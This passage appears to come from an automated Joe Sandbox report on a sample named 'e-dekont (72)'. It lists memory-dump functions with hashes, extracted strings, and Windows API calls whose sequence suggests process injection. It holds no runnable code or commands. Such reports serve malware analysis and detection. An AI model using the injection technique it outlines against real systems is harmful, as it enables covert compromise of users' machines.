                                                                • API String ID: 0-1722624584
                                                                • Opcode ID: a65dd0cbece834450cde2e55eb16864fa41828af595aa71005060d476628829e
                                                                • Instruction ID: 56385122d52e0de8cf8b4f2df3527eb7e58e5f326b1c8efc27eb1763f1e73ba8
                                                                • Opcode Fuzzy Hash: a65dd0cbece834450cde2e55eb16864fa41828af595aa71005060d476628829e
                                                                • Instruction Fuzzy Hash: 88D148B4A05208CFDB58EFA8D558BEDB7F6FB5A300F1081A9D409A7395CB349985CF41
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06C85821
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: ef05dbacd277b052900dbfbe996a24a0ec8ab0cdfd241abb83edae8ca5e57f1e
                                                                • Instruction ID: 2666b7014500577237c41f16dc3fbdb916ccc1d9df73f316bd44d5d70b41bf97
                                                                • Opcode Fuzzy Hash: ef05dbacd277b052900dbfbe996a24a0ec8ab0cdfd241abb83edae8ca5e57f1e
                                                                • Instruction Fuzzy Hash: 9921F4B1D013099FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C7759944CBA0
                                                                APIs
                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06C85821
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2706961497-0
                                                                • Opcode ID: c9911002c180ee31bfe10318a2547163536fb6c394192e472d86432a87dad7cb
                                                                • Instruction ID: b46c017f5b349ad6381469d753c6de3538dbd7f89397e276fe3ddbb4e21d3952
                                                                • Opcode Fuzzy Hash: c9911002c180ee31bfe10318a2547163536fb6c394192e472d86432a87dad7cb
                                                                • Instruction Fuzzy Hash: C421E4B1D013499FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C775A944CBA1
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 06C8683E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 4d003bbaa44eb99419b884868ab0458a29b4f5570ad91ebf5a9d38dee07b4774
                                                                • Instruction ID: b677e524a9c64ef1d48318b01829552974c70d5dedb50f32de77802ab54e92de
                                                                • Opcode Fuzzy Hash: 4d003bbaa44eb99419b884868ab0458a29b4f5570ad91ebf5a9d38dee07b4774
                                                                • Instruction Fuzzy Hash: D21108B1D002499EDB10DFAAC444AAFFBF4EF59314F10842AD419A7250CB79A944CFA1
                                                                APIs
                                                                • NtResumeThread.NTDLL(?,?), ref: 06C8683E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: ad7838c11eb4dadd9abb2c8d241767537011b1db3cbe6ea31542ca196408496a
                                                                • Instruction ID: 4f8808fb378f4e76f7de864682d01fa80b49524c9b96f600cfb519bdb71cb38d
                                                                • Opcode Fuzzy Hash: ad7838c11eb4dadd9abb2c8d241767537011b1db3cbe6ea31542ca196408496a
                                                                • Instruction Fuzzy Hash: 1411E7B1D002498EDB10DFAAC5446AFFBF4FF49314F10842AD519A7250CB79A944CFA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c&A
                                                                • API String ID: 0-2748024365
                                                                • Opcode ID: d05c5ed885d477157585628488ba39d742ca923ed1e0595688dbe09574b0d336
                                                                • Instruction ID: 7471b9ce0c3044107871009e3b3bc377c4d07cd3fd33e33d9da6c48269bd2521
                                                                • Opcode Fuzzy Hash: d05c5ed885d477157585628488ba39d742ca923ed1e0595688dbe09574b0d336
                                                                • Instruction Fuzzy Hash: 16C139B4D02218CFEBA4EFA5C844BADBBF2BF49304F5080AAD409A7795CB355985CF51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Dqq
                                                                • API String ID: 0-373195589
                                                                • Opcode ID: 856938abace47d41f9472476f7469aef1dbc91e15930226a6ad9ba6a0a0acf72
                                                                • Instruction ID: c62834580d96b245eb78509a4a240432676fb998556598516cf3d20a5448ae98
                                                                • Opcode Fuzzy Hash: 856938abace47d41f9472476f7469aef1dbc91e15930226a6ad9ba6a0a0acf72
                                                                • Instruction Fuzzy Hash: 0BD1B3B4E01218CFDB54DFA9D994A9DBBF2BF89300F1081A9D409AB369DB319D81CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 9f9801fdd1eb9dcdb2037a272d000188325b70a2cd829c1e1f491972be0074cf
                                                                • Instruction ID: 20f0984a8ec6e79088b6edc339f117451b1be09c3524061fdb54e3092ea2aa79
                                                                • Opcode Fuzzy Hash: 9f9801fdd1eb9dcdb2037a272d000188325b70a2cd829c1e1f491972be0074cf
                                                                • Instruction Fuzzy Hash: BEC10474E01218CFEB94DFA9D984B9EBBF6BF49300F1081A9D409AB355DB749981CF40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 514d62a89a05cabc9647ce36e2cddb87d127cdea2f28d92e6f30e19459819848
                                                                • Instruction ID: 3943954c19b0d5b38d99f24f94a9c846283ef4f937fd5a896a0d7a2e5ded1501
                                                                • Opcode Fuzzy Hash: 514d62a89a05cabc9647ce36e2cddb87d127cdea2f28d92e6f30e19459819848
                                                                • Instruction Fuzzy Hash: C3B1E570E05218CFEB94DFA9D984B9EBBF6BF49300F1090A9D409EB255DB749985CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8712bf0567d07dbb4b459c05b9d44b6a4f541582fbb96a3d39dc916a27a72b3e
                                                                • Instruction ID: e6d5c93252990441f9e89eed61ed244a967a04b72e826c04a9f4b4d28bb61ced
                                                                • Opcode Fuzzy Hash: 8712bf0567d07dbb4b459c05b9d44b6a4f541582fbb96a3d39dc916a27a72b3e
                                                                • Instruction Fuzzy Hash: 4B025AB0B016168FCB89DF69C49866EFBF2FF88300F248529D556DB391CB30A955CB91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0954dc9595098b811e3129fc7e8d861b829fa9b720475c3a7bb330e5fdb44560
                                                                • Instruction ID: 78fe17572f9d0738750762d36a933f740e1e65ff80e0b3bbd78abbe02bbc1252
                                                                • Opcode Fuzzy Hash: 0954dc9595098b811e3129fc7e8d861b829fa9b720475c3a7bb330e5fdb44560
                                                                • Instruction Fuzzy Hash: DB91BC34A84118CFDB14DF69D458BA977F3FB89305F24D57AE6099B3A8CB719881CB40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6c2616c1f17ed36dcc0c756faa508a58a783d80b1e271f1798db8bd4f86fadb
                                                                • Instruction ID: d6cd95857113268f8beb96bbfea85e880f6f9099b6660514f7a6e0409cebc345
                                                                • Opcode Fuzzy Hash: e6c2616c1f17ed36dcc0c756faa508a58a783d80b1e271f1798db8bd4f86fadb
                                                                • Instruction Fuzzy Hash: DD91AC34A44244CFDB05CF68C480BE9BBB2EB89314F58D2B6D10AAF299D7349C95CB60
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bda4c2039818b06fedf1ed9e7d481173014f1cfea1067720c4fc52a0cf74a9c
                                                                • Instruction ID: 3453d050c80f6f1969a37f404ceb628c1638e1d8e58cb5c1fa7463534de06aa0
                                                                • Opcode Fuzzy Hash: 5bda4c2039818b06fedf1ed9e7d481173014f1cfea1067720c4fc52a0cf74a9c
                                                                • Instruction Fuzzy Hash: E7818D34A84118CFDB14DF69D458BA977F3FB89305F68E579E6099B3A8CB719881CB00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hnq$Hnq$Hnq
                                                                • API String ID: 0-1699790779
                                                                • Opcode ID: 7e973f5c3624c6a9419771c0b7683bd91d5816441d7a3ac60f64107620c08ae6
                                                                • Instruction ID: a8c4368123c6a264392b5a1ec429aa2e5bf83c9703a8ff0351e9598e6a4c2a76
                                                                • Opcode Fuzzy Hash: 7e973f5c3624c6a9419771c0b7683bd91d5816441d7a3ac60f64107620c08ae6
                                                                • Instruction Fuzzy Hash: 18127E70A002158FCB65DFA5C994AAEBBF2FF88300F14852DD506AB365DB31ED45CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq$4'jq
                                                                • API String ID: 0-3078559419
                                                                • Opcode ID: 9db85365575e6f877d635983ca1fb6a0b804fbde5a9dcea79ae75db3a1c8f0f3
                                                                • Instruction ID: f3b2703c05126049be0bea8dfe4a6d755db0acf139605a9dc81ef5db87be262d
                                                                • Opcode Fuzzy Hash: 9db85365575e6f877d635983ca1fb6a0b804fbde5a9dcea79ae75db3a1c8f0f3
                                                                • Instruction Fuzzy Hash: 9EF1C834B10218DFDB44DFA4D994AADB7B2FF89300F118159E906AB3A5DB70ED42CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 08a0840821c578f8fce00e54c334ab371b060edacf4071e79f03d32d96393585
                                                                • Instruction ID: e79a7984020de4767a5e18e4365cc34511aaa5a33d7b7c6d16f577bf3efcb23b
                                                                • Opcode Fuzzy Hash: 08a0840821c578f8fce00e54c334ab371b060edacf4071e79f03d32d96393585
                                                                • Instruction Fuzzy Hash: F142D174E04209CFDF94EB95D558AAEBBB2FF49301F14801AD912AB394C7385E56CFA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $jq$$jq
                                                                • API String ID: 0-3720491408
                                                                • Opcode ID: 99a05cddbbd08ca81fd60f4fd7d7661965f3acba51df967ae7139b8f783220ef
                                                                • Instruction ID: 4628e6313ec9038c631bffaff9bdb42fdf9097b32280d93c2f91df9386059d4c
                                                                • Opcode Fuzzy Hash: 99a05cddbbd08ca81fd60f4fd7d7661965f3acba51df967ae7139b8f783220ef
                                                                • Instruction Fuzzy Hash: 61228D34E012299FCF55DFA5D850AAEBBB2FF48700F148429F811A73A5DB349A45CFA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 2c31faf41308093f504aeb0ea39323690ab54db2e4103757ffd92b0b530fce1f
                                                                • Instruction ID: 61e04d1b0232f6e490b709e47357a68d9f8b1aab76525f13883ffb6b4ca04dc1
                                                                • Opcode Fuzzy Hash: 2c31faf41308093f504aeb0ea39323690ab54db2e4103757ffd92b0b530fce1f
                                                                • Instruction Fuzzy Hash: 41F1C374D11308DFDBA8EFA4E5986ACBBB2FF49311F24416AE416AB354CB345981CF50

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Pljq$$jq
                                                                • API String ID: 0-1466860515
                                                                • Opcode ID: 580d2c331223a0a1addac818c912aa2ad775bf4beb0fb051b59d13643003e07d
                                                                • Instruction ID: 4c9330badbed8b023d832e49a53f534a13473107bd107d45680dfff6c26e2dcd
                                                                • Opcode Fuzzy Hash: 580d2c331223a0a1addac818c912aa2ad775bf4beb0fb051b59d13643003e07d
                                                                • Instruction Fuzzy Hash: 0DB13730B402158FCB54EF29C894AAA7BF6BF89710B1441A9E505CB3B5EB71DD41CBA1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 2b59e20cb0468459b87713b144054c2c86b3dadad1d8eb79863cd8aced351321
                                                                • Instruction ID: cfb2bda2737390438b754e163051cea018d9fa48933ec418fdd2251c925e475a
                                                                • Opcode Fuzzy Hash: 2b59e20cb0468459b87713b144054c2c86b3dadad1d8eb79863cd8aced351321
                                                                • Instruction Fuzzy Hash: D5A1C174E01209CFDB58EFA5D5586ADBBB2FF49301F14802AD912BB354CB345A56CF60

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$(nq
                                                                • API String ID: 0-2974481825
                                                                • Opcode ID: 1e40b74aae8bbd682da19078312217b037b0248adfc3fca4f16ce41b5b5775a1
                                                                • Instruction ID: b116b0f92400edf366a1d0d1a5271a5207466930438c1ccf5eb4b80d5a76aba6
                                                                • Opcode Fuzzy Hash: 1e40b74aae8bbd682da19078312217b037b0248adfc3fca4f16ce41b5b5775a1
                                                                • Instruction Fuzzy Hash: DA51FE313002158FCB559F69D894AAE3BA6FF88310F108569E806CB3A6CF35DD56CBE1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$Hnq
                                                                • API String ID: 0-3116299003
                                                                • Opcode ID: f6490d14b4bc9049f67507128f95d00a5f077d753b8c387897ab04457844bef7
                                                                • Instruction ID: f40cb59166a7cc2c428c0432b40107fe944d338ad07905c0d5a80839e06808fb
                                                                • Opcode Fuzzy Hash: f6490d14b4bc9049f67507128f95d00a5f077d753b8c387897ab04457844bef7
                                                                • Instruction Fuzzy Hash: AE51AC707002148FCB99AF78D86466E7BB7BF99200B1444ADD906DB3A5CF35DC06CBA5

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !$)
                                                                • API String ID: 0-1972669455

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$&
                                                                • API String ID: 0-3870246384

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A$T
                                                                • API String ID: 0-334973614
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq
                                                                • API String ID: 0-1069744364
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (_jq
                                                                • API String ID: 0-2603807687
                                                                APIs
                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C85FDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                APIs
                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C85FDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $jq
                                                                • API String ID: 0-2886413773
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 06C881FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                • API String ID: 1304948518-0
                                                                APIs
                                                                • CopyFileA.KERNEL32(?,?,?), ref: 06C881FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: CopyFile
                                                                • String ID:
                                                                • API String ID: 1304948518-0
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C866B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C866B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C8617E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C8617E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06C86A84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06C86A84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06CFDE64
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C8658E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hnq
                                                                • API String ID: 0-2896580000
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C8658E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PHjq
                                                                • API String ID: 0-751881793
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: f2kI
                                                                • API String ID: 0-2448362853
                                                                Strings
                                                                Memory Dump Source
